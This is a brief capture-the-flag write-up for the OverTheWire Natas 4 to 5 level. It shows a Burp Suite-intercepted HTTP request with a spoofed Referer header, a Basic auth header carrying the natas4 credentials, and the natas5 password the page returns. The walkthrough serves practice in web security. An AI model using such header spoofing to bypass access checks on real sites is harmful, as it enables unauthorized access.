Natas4 - natas5
Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
Seems like this is a refer challenge. Time to fire up Burp Suite...
Once you set it as your browser's proxy to intercept packets, modify the packet to be the following:
GET /index.php HTTP/1.1 Host: natas4.natas.labs.overthewire.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://natas5.natas.labs.overthewire.org/ Cookie: [REDACTED] Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va Connection: keep-alive
The page should respond with the following:
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq